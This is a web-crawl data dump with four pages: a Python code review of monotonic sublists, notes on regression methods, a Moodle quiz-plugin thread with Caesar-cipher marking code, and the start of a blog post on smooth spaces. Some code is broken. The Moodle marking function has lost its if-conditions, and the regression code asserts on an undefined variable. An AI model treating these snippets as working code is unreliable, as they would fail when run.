url
stringlengths
14
2.42k
text
stringlengths
100
1.02M
date
stringlengths
19
19
metadata
stringlengths
1.06k
1.1k
https://codereview.stackexchange.com/questions/213198/get-all-monotonic-sublists-from-a-list
# Get all monotonic sublists from a list So, i recently wrote code that can count the number of monotonic items (increasing, decreasing and constant). For an input such as x = [1,2,3,3,2,0] The provided example was: 1. Increasing: [1,2], [2,3], [1,2,3] 2. Constant: [3,3] 3. Decreasing: [3,2], [2,0], [3,2,0] So, i broke the problem into two steps, firstly just getting all biggest monotonic sequences, and then finding all sub-lists within those sequences. During the process it seemed to me that things started getting rather long and i was surprised by how "big" the whole thing seemed by the end of it. I was wondering if there are any tricks i missed or steps i could have done better. Also looking for tips on code readability as well. Code starts below: x = [1,2,3,3,2,0] prev = x[0] curr = x[1] #keep track of two items together during iteration, previous and current result = {"increasing": [], "equal": [], "decreasing": [], } def two_item_relation(prev, curr): #compare two items in list, results in what is effectively a 3 way flag if prev < curr: return "increasing" elif prev == curr: return "equal" else: return "decreasing" prev_state = two_item_relation(prev, curr) #keep track of previous state result[prev_state].append([prev]) #handle first item of list x_shifted = iter(x) next(x_shifted) #x_shifted is now similar to x[1:] for curr in x_shifted: curr_state = two_item_relation(prev, curr) if prev_state == curr_state: #compare if current and previous states were same. result[curr_state][-1].append(curr) else: #states were different. aka a change in trend result[curr_state].append([]) result[curr_state][-1].extend([prev, curr]) prev = curr prev_state = curr_state def all_subcombinations(lst): #given a list, get all "sublists" using sliding windows if len(lst) < 3: return [lst] else: result = [] for i in range(2, len(lst) + 1): for j in range(len(lst) - i + 1): result.extend([lst[j:j + i]]) return result print(" all Outputs ") result_all_combinations = {} for k, v in result.items(): result_all_combinations[k] = [] for item in v: result_all_combinations[k].extend(all_subcombinations(item)) print(result_all_combinations) #Output: {'increasing': [[1, 2], [2, 3], [1, 2, 3]], 'equal': [[3, 3]], 'decreasing': [[3, 2], [2, 0], [3, 2, 0]]} Organize I believe you would do well to restructure your code. You have two functions, why not write one more, and then separate your testing from your actual code? if __name__ == '__main__': x = [1,2,3,3,2,0] result = find_monotone_sequences(x) # Wrap your code in this function print(" all Outputs ") result_all_combinations = {} for k, v in result.items(): result_all_combinations[k] = [] for item in v: result_all_combinations[k].extend(all_subcombinations(item)) print(result_all_combinations) #Output: #{'increasing': [[1, 2], [2, 3], [1, 2, 3]], # 'equal': [[3, 3]], # 'decreasing': [[3, 2], [2, 0], [3, 2, 0]]} Use collections.defaultdict Next, take advantage of some built-in features: result = {"increasing": [], "equal": [], "decreasing": [], } This is a dictionary where every value defaults to an empty list. Another word for that is a collections.defaultdict: from collections import defaultdict result = defaultdict(list) # Note: no parens after list - passing in function Now you don't have to provide the explicit names and values! Next, you should take advantage of the iterator you are already creating! prev = x[0] curr = x[1] #keep track of two items together during iteration, previous and current prev_state = two_item_relation(prev, curr) #keep track of previous state result[prev_state].append([prev]) #handle first item of list x_shifted = iter(x) next(x_shifted) #x_shifted is now similar to x[1:] Instead of accessing x[0] and x[1], why not use the iterator? xiter = iter(x) prev = next(xiter) curr = next(xiter) prev_state = two_item_relation(prev, curr) #keep track of previous state result[prev_state].append([prev]) #handle first item of list for curr in xiter: # etc... Recognize patterns in your code (use itertools!) Finally, I'd like to point out the behavior of your main loop: for curr in x_shifted: curr_state = two_item_relation(prev, curr) if prev_state == curr_state: #compare if current and previous states were same. result[curr_state][-1].append(curr) else: #states were different. aka a change in trend result[curr_state].append([]) result[curr_state][-1].extend([prev, curr]) prev = curr prev_state = curr_state This loops over the input values, comparing each value with the prior one, and determines a 'state'. Depending on the state, the input values are broken into groups corresponding to the state. Or: the input sequence is grouped by the computed state. It turns out there's an app for that: itertools.groupby will take a sequence and a key function, and break the sequence into groups according to the values taken on by the key! This means your can rewrite your code into a simple processing loop that computes the state and associates it with the values (except the initial member, of course). Furthermore, if you investigate the recipes section of the itertools module, you will find a function named pairwise that allows a sequence to be processed in pairs: def pairwise(iterable): "s -> (s0,s1), (s1,s2), (s2, s3), ..." a, b = tee(iterable) next(b, None) return zip(a, b) seq = x # x is not a very good name relations = [(two_item_relation(*pair), *pair) for pair in pairwise(seq)] There is still the matter of the special treatment of the first value, but you can do it with the values all in hand. (If you're just learning Python, the *pair syntax "flattens" the pair in place. It is equivalent to writing: pair[0], pair[1] where-ever *pair is seen. Thus relation(*pair) is like relation(pair[0], pair[1]).) • Thanks a ton, this was super helpful! The grouper thing is something i am not sure i understand enough to apply just yet im afraid, but will see. A Question about tee, does it create a copy of the list in memory? – Paritosh Singh Feb 11 at 17:19 • tee duplicates the iterator, not the sequence being iterated. If you want to copy a list, try b = a[:] for that. – Austin Hastings Feb 11 at 17:56 • perfect, ty. in this case, i wanted to ensure i didn't make an unnecessary copy, it was why i avoided slicing in the first place. – Paritosh Singh Feb 11 at 18:03 A few changes: Strings shouldn't be used here for keeping track of comparison results. Strings are prone to being typo'd, and may lead to unexpected results (like indexing result causing KeyErrors at runtime). I'd take a page from Java (and other languages) and use -1, 0 and 1 to indicate the results of a comparison. You can see it being used in an answer here. I'd make the following changes: result = {1: [], # Increasing 0: [], # Equal -1: [] # Decreasing } def two_item_relation(prev, curr): if prev < curr: return 1 elif prev == curr: return 0 else: return -1 It's much harder to mistype -1 than it is, for example, "decreasing". If you really wanted Strings for pretty printing purposes (like for your output at the bottom), you could maintain a dictionary mapping comparison numbers to strings: pp_result = {1: "Increasing", 0: "Equal", -1: "Decreasing" } The point is that you shouldn't use easily mistyped things as keys unless necessary. Strings also may be slower to compare, and may take more memory, but hash caching and String interning may negate those problems in some cases. You could also write that function as something like: def two_item_relation(prev, curr): return 1 if prev < curr else \ 0 if prev == curr else \ -1 But I'm probably going to get yelled at for even bringing that up. Conditional expressions/ternaries are nice in many cases when you want to conditionally return one or another thing, but they get a little murky as soon as you're using them to decide between three different things. It's especially bad here because this pretty much needs to be split over a few lines, which necessitates the use of line continuation characters, which are a little noisy. I'm bringing it up in case you're unaware of conditional expressions, not because I'm necessarily suggesting their use here. You could use enums as well: from enum import Enum class Compare_Result(Enum): INCREASING = 1 EQUAL = 0 DECREASING = -1 def two_item_relation(prev, curr): if prev < curr: return Compare_Result.INCREASING elif prev == curr: return Compare_Result.EQUAL else: return Compare_Result.DECREASING This has the benefit that it makes it obvious what each result actually means. They also prints out semi-nicely, so the "pretty-printing map" may not be as necessary: >>> str(Compare_Result.INCREASING) 'Compare_Result.INCREASING' >>> repr(Compare_Result.INCREASING) '<Compare_Result.INCREASING: 1>' And, if you do typo a name (which is harder to do since IDEs can autocomplete Compare_Result.), it will fail outright with an error: >>> Compare_Result.INCRESING Traceback (most recent call last): File "<pyshell#5>", line 1, in <module> Compare_Result.INCRESING File "C:\Users\slomi\AppData\Local\Programs\Python\Python36-32\lib\enum.py", line 324, in __getattr__ raise AttributeError(name) from None AttributeError: INCRESING Unfortunately though, this error does not happen immediately like it does in other languages. The faulty code needs to actually be interpreted before the error is caught. This seems to make enums less useful in Python than in languages like Java or C++, but it's still less error-prone than using Strings or Numbers. Honestly, I'm too tired right now to comment on the algorithm, but hopefully this was helpful. • Thanks a lot. I am used to making booleans for flags, but i couldn't think of a good alternative to a 3 way flag on my own. really like using the ints for keys but a mapping for pretty printing the outputs. – Paritosh Singh Feb 11 at 17:18 • @ParitoshSingh No problem. Note though, numbers are a simple solution, but they still aren't ideal. They don't carry any information about what they mean. I did a quick dive into using Enums, and edited an example of their use into the bottom of my answer. It's worth a look since they offer an even better solution. – Carcigenicate Feb 11 at 17:34
2019-04-23 23:12:24
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.31942611932754517, "perplexity": 3712.2689749162505}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578613888.70/warc/CC-MAIN-20190423214818-20190424000818-00306.warc.gz"}
https://xn--2-umb.com/20/regression/
# Regression graph BT; graph BT; GENRLS[Generalized Elastic-net-regularized least squares]; ENRLS[Elastic-net-regularized least squares]-->GENRLS; LASSO[Lasso regression]-->ENRLS; GRLS[Generalized Tikhonov-regularized least squares]-->GENRLS; LR[Lavrentyev-regularized regularization]-->GRLS; RLS[Tikhonov-regularized least squares]-->ENRLS; RLS-->GRLS; GLS[Generalized Least Squares]-->RLS; WLS[Weighted Least Squares]-->GLS; OLS[Ordinary Least Squares]-->WLS; Fahrplan: • Present regressions as unintepreted mathematical constructions. • Present parameter estimation models and show how certain regressions solve them (Gauss-Markov-Aitken theorem). • Present forecasting models and show how to solve them. https://ryxcommar.com/2019/07/14/on-moving-from-statistics-to-machine-learning-the-final-stage-of-grief/ ## Linear regression Definition. Given an input set $\mathcal X$ and an input vector $\vec x ∈ {\mathcal X}^n$ and a set of $m$ basis functions $f_i : \mathcal X → \R$, a linear regression model is the relation $$\vec y = X(\vec x) ⋅ \vec b + \vec e$$ where $$X(\vec x) ≜ \begin{bmatrix} f_0(x_0) & f_1(x_0) & f_2(x_0) & ⋯ & f_m(x_0) \\ f_0(x_1) & f_1(x_1) & f_2(x_1) & ⋯ & f_m(x_1) \\ f_0(x_2) & f_1(x_2) & f_2(x_2) & ⋯ & f_m(x_2) \\ ⋮ & ⋮ & ⋮ & ⋱ & ⋮ \\ f_0(x_n) & f_1(x_n) & f_2(x_n) & ⋯ & f_m(x_n) \\ \end{bmatrix}$$ Note. The generalization where the output space is higher dimensional $\vec y ∈ \R^{n \times d}$, $f_i : \mathcal X → \R^d$ is really just a special case where we treat each component as a separate. Note. The matrix $X$ is called the design matrix, model matrix or regressor matrix. The vector $\vec y$ is called the response vector or dependent variable, $\vec b$ is called the parameter vector, $\vec e$ is called the error vector and $\vec x$ is called the independent variable, predictor variable, regressor, covariate, explanatory variable, control variable and in the context exposure variable, risk factor, feature or input variable. (See this overview). Question. Can this be generalized from $\R$ to $\C$ or arbitrary vector spaces? Are there even normed vector spaces not $\R$ or $\C$? Simple least squares is the special case with $\mathcal X = \R$, $m = 2$, $f_0(x) = 1$ and $f_1(x) = x$. Ordinary least squares is the special case with $\mathcal X = \R^p$, $m = p + 1$, $f_i(\vec x) = x_i$ and $f_p(\vec x) = 1$. In rare cases the $f_p$ can be left out. Polynomial regression is the special case with $\mathcal X = \R$ and $f_i(x) = x^i$. In this case the design matrix is a Vandermonde matrix. Note. In ordinary least squares it is common to include a constant intercept by setting $x_{0i} = 1$. Equivalently, a basis function $f_{p}(\vec x) = 1$ can be used. In either case, the coefficient associated with the constant function is called the intercept. To do. More special cases of the design matrix: ANOVA, ANCOVA, MANCOVA, Linear regression, polynomial regression, To do. Goodness of fit metrics such as $R^2$, $\bar{R}^2$, Log-likelihood, Durbin-Watson statistic, Akaike criterion, Schwarz criterion, F-test, Wilks's Lambda. (See here). To do. Discuss other methods like total least squares, Errors-in-variables models, modelling uncertainty in $\vec x$. To do. Discuss other goals like least absolute deviations, median absolute deviation, relative mean absolute difference, mean absolute deviation, minimum maximal deviation, Lasso regression, Basis pursuit denoising. See also here. Iteratively reweighted least squares can solve goals that are $p$-norms. ### Generalized Tikhonov-regularized least squares Definition. Given a linear regression model, parameter mean ${\vec b}_0 ∈ \R^m$, and a covariance matrices $K_e ∈ \R^{n × n}$ and $K_b ∈ \R^{m × m}$, the Generalized Tikhonov-regularized least squares estimator $\hat{\vec b}$ is the value of $\vec b$ that minimizes the combined Mahalanobis norm of the residual vector $\vec e$ and the parameter vector $\vec b$: $$\hat{\vec b} ≜ \arg\min_{\vec b} \norm{\vec y - X ⋅ \vec b}_{K_e}^2 + \norm{\vec b - {\vec b}_0}_{K_b}^2$$ Note. The special case where $K_b = \lambda I$ is the (non-generalized) Tikhonov regression and also know as Ridge regression. In statistics, the method is known as ridge regression, in machine learning it is known as weight decay, and with multiple independent discoveries, it is also variously known as the Tikhonov–Miller method, the Phillips–Twomey method, the constrained linear inversion method, and the method of linear regularization. It is related to the Levenberg–Marquardt algorithm for non-linear least-squares problems. Note. The special case where $K_e = X$ is the Lavrentyev regularization. Note. The special case where $K_b = 0$ is the generalized least squares. The generalized least squares is unbiased in $b$, but can ill-conditioned. Note. The special case where $K_b = 0$ and $K_e = \operatorname{diag}(\vec w)$ is weighted least squares. Note. The special case where $K_b = 0$ and $K_e = I$ is ordinary least squares. Note. The matrices $X^T ⋅ \vec y$ and $X^T ⋅ X$ are moment matrix. Theorem. The generalized Tikhonov-regularized least squares estimator has a closed form solution $$\hat{\vec b} = \p{X^T ⋅ {K_e}^{-1} ⋅ X + K_{b}}^{-1} ⋅ \p{X^T ⋅ {K_e}^{-1} ⋅ \vec y + K_b ⋅ {\vec b}_0}$$ To do. Proof by derivation. To do. Derive expected value and variance of $\hat{\vec b}$ like here. Algorithm. While the closed form solution can be used directly, it is numerically unstable. A more stable algorithm is the following: First, the problem is reduced to a generalized least squares regression \begin{aligned} \hat{\vec b} &= \arg\min_{\vec b} \norm{ \begin{bmatrix} \vec y \\ {\vec b}_0 \end{bmatrix} - \begin{bmatrix} X\p{\vec x} \\ I \end{bmatrix} ⋅ \vec b }_K & K &≜ \begin{bmatrix} K_e & 0 \\ 0 & K_b \end{bmatrix} \end{aligned} which is then reduced to an ordinary least squares using a whitening transform with $W^*W = K^{-1}$ $$\hat{\vec b} ≜ \arg\min_{\vec b} \norm{ W ⋅ \begin{bmatrix} \vec y \\ {\vec b}_0 \end{bmatrix} - W ⋅ \begin{bmatrix} X\p{\vec x} \\ I \end{bmatrix} ⋅ \vec b }$$ Finally, this is solved using the Moore-Penrose inverse computed using SVD. def least_squares(y, X, K_e=None, K_b=None, b_0=None): n, m = X.shape assert x.shape == (n,) assert y.shape == (n,) if K_e is None: # Ordinary least squares K_e = np.eye(n) if K_e.shape == (n,): # Weighted least squares K_e = np.diag(K_e) assert K_e.shape == (n,n) if not K_b is None: if np.isscalar(K_b): K_b = K_b * np.ones(m) if K_b.shape == (m,): K_b = np.diag(K_b) assert K_b.shape == (m,m) if b_0 is None: b_0 = np.zeros(m) assert b_0.shape == (m,) # Reduce Tikhonov-regularization to generalized least squares y = np.concatenate([y, b_0]) X = np.block([[X],[np.eye(m)]]) K_e = np.block([ [K_e, np.zeros((n, m))], [np.zeros((m, n)), K_b] ]) # Reduce generalized to ordinary least squares W = whitening_transform(K_e) y = np.matmul(W, y) X = np.matmul(W, X) # Solve OLS using Moore-Penrose inverse b = np.matmul(np.linalg.pinv(X), y) return b ### Least Angle Regression Definition. Given a linear regression model, parameter mean ${\vec b}_0 ∈ \R^m$, and a covariance matrices $K_e ∈ \R^{n × n}$ and $K_b ∈ \R^{m × m}$, the Generalized Thikononv-Lasso estimator $\hat{\vec b}$ is the value of $\vec b$ that minimizes the combined Mahalanobis norm of the residual vector $\vec e$ and the parameter vector $\vec b$: $$\hat{\vec b} ≜ \arg\min_{\vec b} \norm{\vec y - X ⋅ \vec b}_{K_e}^2 + \norm{\vec b - {\vec b}_0}_{K_b}^2 + \norm{\vec b - {\vec b}_0}_{1,K_b'}$$ https://en.wikipedia.org/wiki/Elastic_net_regularization To do. The generalized Lasso problem and the LARS(Lasso) solution from Algorithm 3.2a in HTF09. https://en.wikipedia.org/wiki/Least-angle_regression To do. Equivalence to support vector machines and the efficient solving algorithms employed there. ## Gauss-Markov-Aitken Theorem To do. This does not generalize to higher dimensions without the additional constraint that the estimator is unbiased. See https://en.wikipedia.org/wiki/Stein%27s_example https://en.wikipedia.org/wiki/James%E2%80%93Stein_estimator. https://en.wikipedia.org/wiki/Gauss%E2%80%93Markov_theorem#Generalized_least_squares_estimator https://en.wikipedia.org/wiki/Best_linear_unbiased_prediction https://en.wikipedia.org/wiki/Minimum_mean_square_error To do. https://en.wikipedia.org/wiki/Bayesian_interpretation_of_kernel_regularization https://stats.stackexchange.com/questions/163388/why-is-the-l2-regularization-equivalent-to-gaussian-prior To do. Generalized-Tikhonov has multinormal prior on $\hat{\vec b}$. Lasso has Laplacian prior. ## General linear model https://en.wikipedia.org/wiki/General_linear_model $$Y = X ⋅ B + U$$ ## Mixed model https://en.wikipedia.org/wiki/Mixed_model ## Non-linear regression model Definition. Given an input set $\mathcal X$, parameter set $\mathcal B$, input vector $\vec x ∈ {\mathcal X}^n$ and model function $f : \mathcal X \times \mathcal B → \R$, a nonlinear regression model is the relation $$y_i = f(x_i, b) + e_i$$ for some $b ∈ \mathcal B$. ### Nonlinear least squares Definition. Nonlinear least squares https://en.wikipedia.org/wiki/Non-linear_least_squares $$\hat{\vec b} ≜ \arg\min_{b} \norm{\vec e}$$ No closed form solution. Can be solved using global optimizers. Depending on $f$ a gradient may be available. Algorithm. One method for solving is the Levenberg–Marquardt algorithm. Special cases are the Gauss-Newton algorithm and gradient descent To do. Extend to norms other than Euclidean. ### Partial least squares https://en.wikipedia.org/wiki/Partial_least_squares_regression ### Principal component regression https://en.wikipedia.org/wiki/Principal_component_analysis https://en.wikipedia.org/wiki/Principal_component_regression ### Rational function regression Initiate the optimization problem using a good seed value provided by solving the linear model $p(x) - q(x) y$. $$\vec y = \p{P(\vec x) ⋅ \vec b_p} ⊘ \p{Q(\vec x)⋅ \vec b_q} + \vec e$$ where $⊘$ is Hadamard division. $$\p{Q ⋅ \vec b_q} ⊙ \vec y = P ⋅ \vec b_p + \p{Q ⋅ \vec b_q} ⊙ \vec e$$ $$\operatorname{diag} \p{Q ⋅ \vec b_q} ⋅ \vec y = P ⋅ \vec b_p + \operatorname{diag} \p{Q ⋅ \vec b_q} ⋅ \vec e$$ $$\operatorname{diag} \p{Q ⋅ \vec b_q} ⋅ \vec e = \operatorname{diag} \p{Q ⋅ \vec b_q} ⋅ \vec y - P ⋅ \vec b_p$$ $$\vec e = \operatorname{diag} \p{Q ⋅ \vec b_q}^{-1} ⋅ \p {\operatorname{diag} \p{Q ⋅ \vec b_q} ⋅ \vec y - P ⋅ \vec b_p }$$ $$\vec e = \vec y - \operatorname{diag} \p{Q ⋅ \vec b_q}^{-1} ⋅ P ⋅ \vec b_p$$ $$\hat{\vec b} ≜ \arg\min_{\vec b} \norm{\vec e}_Ω$$ ## Universal Kriging http://www.kgs.ku.edu/Conferences/IAMG//Sessions/D/Papers/boogaart.pdf https://www.nersc.no/sites/www.nersc.no/files/Basics2kriging.pdf https://en.wikipedia.org/wiki/Regression-kriging Special case: Gaussian-Process-Regression https://people.cs.umass.edu/~wallach/talks/gp_intro.pdf http://www.gaussianprocess.org/gpml/chapters/RW2.pdf ## Rational Regression Kriging Goal. Find the best fit Rational-Kriging model for a $\R^m → \R^n$ function given samples from $\R^m × \R^n$ . $$\vec F(\vec x) = \vec m(\vec x) + \vec \epsilon'(\vec x) + \vec \epsilon''$$ Where $\vec m$ is rational function and $\epsilon'$ is a Gaussian process and $\vec \epsilon''$ are normally distributed residual errors. The hyper-parameters of the model are the numerator and denominator degree of the rational function, the covariance kernel of the Gaussian process and the variance of the residual errors. https://en.wikipedia.org/wiki/Regression-kriging https://en.wikipedia.org/wiki/Generalized_least_squares Rational trend model https://en.wikipedia.org/wiki/Polynomial_regression https://en.wikipedia.org/wiki/Polynomial_and_rational_function_modeling To do. What if we have uncertainty in $\vec x$ like we have in $\vec y$ through $\vec \epsilon''$? https://hal-emse.ccsd.cnrs.fr/emse-01525674/file/paperHAL.pdf To do. The polynomial and rational Equioscillation Theorem/. ## Support Vector Machines https://en.wikipedia.org/wiki/Support_vector_machine ## Bayesian Optimization https://arxiv.org/abs/1807.02811 https://arxiv.org/abs/1009.5419 To do. https://en.wikipedia.org/wiki/Markov_decision_process https://math.stackexchange.com/questions/924482/least-squares-regression-matrix-for-rational-functions ## References • Trevor Hastie, Robert Tibshirani & Jerome Friedman (2009). “The Elements of Statistical Learning: Data Mining, Inference, and Prediction”. Available online. • Carl Edward Rasmussen & Christopher K. I. Williams (2006). “Gaussian Processes for Machine Learning”. Available online. https://stats.stackexchange.com/questions/396914/why-is-computing-ridge-regression-with-a-cholesky-decomposition-much-quicker-tha https://www.analyticsvidhya.com/blog/2016/01/ridge-lasso-regression-python-complete-tutorial/ https://statweb.stanford.edu/~tibs/sta305files/Rudyregularization.pdf Remco Bloemen Math & Engineering https://2π.com
2021-01-25 01:11:26
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9256276488304138, "perplexity": 1998.2553453358953}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703561996.72/warc/CC-MAIN-20210124235054-20210125025054-00528.warc.gz"}
https://moodle.org/mod/forum/discuss.php?d=373315&parent=1505135
## Quiz ### Quiz Plugin Re: Quiz Plugin You might catch more interested people if you post in the Quiz forum: https://moodle.org/mod/forum/view.php?id=737 Also, I am not watching a 13-minute video, at least not now (any chance of a few paragraphs and screen grabs?) but I wonder if there is any overlap with https://moodle.org/mod/forum/discuss.php?d=373329. Average of ratings: - Re: Quiz Plugin > any chance of a few paragraphs and screen grabs? Sure. Recently there was a query about generating questions with randomized parameters and they specifically mentioned Caesar's cipher. So, before breakfast I created such a question. The following screen shots will show two different students interacting with the question. First, s1 views the question: On another computer, s2 selects the same problem, but he is given a different plaintext and key: s2 submits his solution and is marked. There is nothing super remarkable about this, except that you don't need to program in PHP. You can choose any language that can use CGI. The code to create this question is quite straightforward (assuming you are comfortable with Python): # This will define the question (choose a plaintext and a key) def gen_vals(seed): random.seed(seed) plaintexts = [ 'semper fidelis', 'attack at dawn', 'top secret', ] # Choose one plaintext for the question plaintext = plaintexts[random.randint(0, len(plaintexts) - 1)] # Now, choose a key key = random.randint(1, 25) return [key, plaintext] This is then used by the function to generate a specification: def gen_spec(rand_vals): key, plaintext = rand_vals return "Perform a Caesar cypher on the plaintext '{}' using the key {:d} and enter the result in the box below.".format(plaintext, key) and by the function to generate the correct answer: def gen_answer(rand_vals): key, plaintext = rand_vals return caesar(key, plaintext) but the best thing is that the marking function can provide very specific feedback: # Mark the response def gen_mark(rand_vals, response): return "1\nWell done, {} is the correct answer".format(response) return "0.5\nYour solution is correct except for the case of the letters." else: # Provide some feedback on an incorrect answer. return "0\n{} is not correct.\n There should be {:d} characters in your response".format(response, len(gen_answer(rand_vals))) else: # Check if they encrypted using an incorrect key key, plaintext = rand_vals student_key = ord(response[0]) - ord(plaintext[0]) # work out the shift for the first letter if caesar(student_key, plaintext) == response: return "0.25\nYou correctly encrypted the plaintext, but you used the wrong key ({:d})".format(student_key) else: return "0\n{} is not correct".format(response) This function first checks if the answer is correct, in which case, the response is worth full marks (1), otherwise, it checks that the case matches, in which case, the mark will be 0.5. Next, it checks the length is OK, which can help the student spot errors. Finally, it checks if the student encrypted with the wrong key and, in this case, the student is awarded 25% of the marks. If you use this question in a lab, you will soon discover what the most common misconceptions are and you can tailor the mark function to provide specific feedback for that misconception. Naturally, you will need to be a programmer to write this code, but you only need to write four shortish functions in a language of your choice. To add this question to a quiz, first on the moodle end, you will have to add this plugin type to your quiz and give it an appropriate name and category. That's it. On the Python end, you need to place your code in the appropriate directory (based on the question name and category). You also need to ensure that cgi is enabled on your web server. Sorry this post is so long. I have not the skill to shorten it. PS thanks for your tip on the quiz forum. I don't think the plugin ready for primetime yet. I don't understand enough of Moodle code to ensure that I'm not breaking something. If noone else is interested, I'll use it this year and then I can see about releasing it when I'm more confident. PPS I am very pleased to see your new plugin allowing use of question outside the quiz environment. Average of ratings: Useful (1) Re: Quiz Plugin Sounds intriguing. Could you put the source on Github (or equivalent). I got some really helpful code contributed to one of my question types recently via Github. Average of ratings: - Re: Quiz Plugin Moving this to the Quiz forum as suggested by Tim... Average of ratings: - Re: Quiz Plugin Thanks Marcus, I put the code + installation note here: http://www.computing.dcu.ie/~cdaly/qtype_plugin.zip I may lookup github later. Charlie Average of ratings: Useful (1) Re: Quiz Plugin It's now on github: Average of ratings: Useful (1)
2018-07-23 11:34:19
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.19002242386341095, "perplexity": 2923.895205165167}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-30/segments/1531676596336.96/warc/CC-MAIN-20180723110342-20180723130342-00019.warc.gz"}
http://golem.ph.utexas.edu/category/2008/04/comparative_smootheology_ii.html
## April 17, 2008 ### Comparative Smootheology, II #### Posted by John Baez A while back, Urs blogged about Andrew Stacey’s paper comparing various flavors of ‘smooth space’ that generalize the concept of manifold: My student Alex Hoffnung and I are writing a paper on two of these flavors: Chen’s ‘differentiable spaces’ and Souriau’s ‘diffeological spaces’. So, I found Andrew’s detailed comparison to be very helpful, and I decided to ask him a question that had been bugging me: could Chen’s spaces be equivalent to Souriau’s? Chen spaces and diffeological spaces are formally very similar. The key difference is that a Chen space is equipped with a bunch of ‘plots’ that are maps into it from convex subsets of $\mathbb{R}^n$, while a diffeological space has plots that are maps into it from open subsets of $\mathbb{R}^n$. It seemed unlikely that the resulting notions were equivalent, but I didn’t have a proof — and it would be embarrassing to write a paper about two different kinds of smooth space and only later realize they were the same! My first hoped-for counterexample, manifolds with boundary, fell through quite a while ago. So, I wanted to ask Andrew about this. In the process of getting ready to ask this question, I reread his paper to see precisely which definition of Chen spaces he was using. In the process, I came up with some other questions that were so detailed and technical that I didn’t want to bring them up here — when you ask nitpicky questions in public it’s easy to seem like you’re trying to score rhetorical points. So, I sent him a couple of emails… but then he suggested talking about this stuff on the blog, which seems like a great idea. So, here are my emails. I’ll post Andrew’s reply as a ‘comment’. His reply gives all 4 definitions of Chen spaces that I vaguely allude to here. Dear Andrew - Hi! I’m really enjoying your paper Comparative Smootheology, especially now that my student Alex Hoffnung are writing a paper about Chen spaces and diffeological spaces, so that all sorts of detailed issues are on my mind. Here are two questions / comments: 1) Chen defined “differentiable spaces” in 3 different ways in the 3 papers I have access to right now: • K.-T. Chen, Iterated integrals of differential forms and loop space homology, Ann. Math. 97 (1973), 217–246. • K.-T. Chen, Iterated integrals, fundamental groups and covering spaces, Trans. Amer. Math. Soc. 206, (1975), 83–98. • K.-T. Chen, Iterated path integrals, Bull. Amer. Math. Soc. 83, (1977), 831–879. I need to look at his fourth paper again: • K.-T. Chen, On differentiable spaces, Categories in Continuum Physics, Lecture Notes in Math. 1174, Springer, Berlin, (1986), 38–42 Does use the 1977 definition or yet another one? (That’s not a question to you, mainly — I’m just wondering. But, if you know I’d be interested, since I can’t get that paper here in Shanghai.) Anyway: I think your “early Chen spaces” are not precisely the differentiable spaces from Chen’s 1973 paper. In this paper he requires that the space be, not just a topological space, but a Hausdorff space. Also: I think your “Chen spaces” are not precisely the differentiable spaces from Chen’s 1977 paper. In this paper he takes the domain of a plot to be any convex subset of $\mathbb{R}^n$, while you require that this domain be closed. Is there some reason you made these changes? I don’t know how important these issues are, but it might be helpful, for people trying to straighten out this tangled tale, to note that you’re adding two new definitions to Chen’s three. (Unless, of course, I’m making a mistake!) 2) Are your categories “Chen” and “Souriau” equivalent or not? It seems like probably not. You don’t seem to prove this: instead, you construct some adjunctions between them and show they’re not equivalences. But, maybe you understand the situation well enough to easily figure this out! Maybe it’s easier to show there’s no equivalence that acts as the identity on the underlying sets and functions. In principle there could be some sneakier equivalence. I’m actually interested in showing that Chen’s 1977 category is not equivalent to “Souriau”, but I’ll take whatever words of advice you can offer! Best, jb And then: Dear Andrew - Here’s another niggly little remark. I really like the theorem of Kriegl and Michor that you cite: Let $K$ be a convex subset of $\mathbb{R}^n$ Let $f: K \to \mathbb{R}^m$. Then $f$ maps smooth curves in $K$ to smooth curves in $\mathbb{R}^m$ iff $f$ is smooth on the interior of $K$ and all derivatives (on the interior) extend 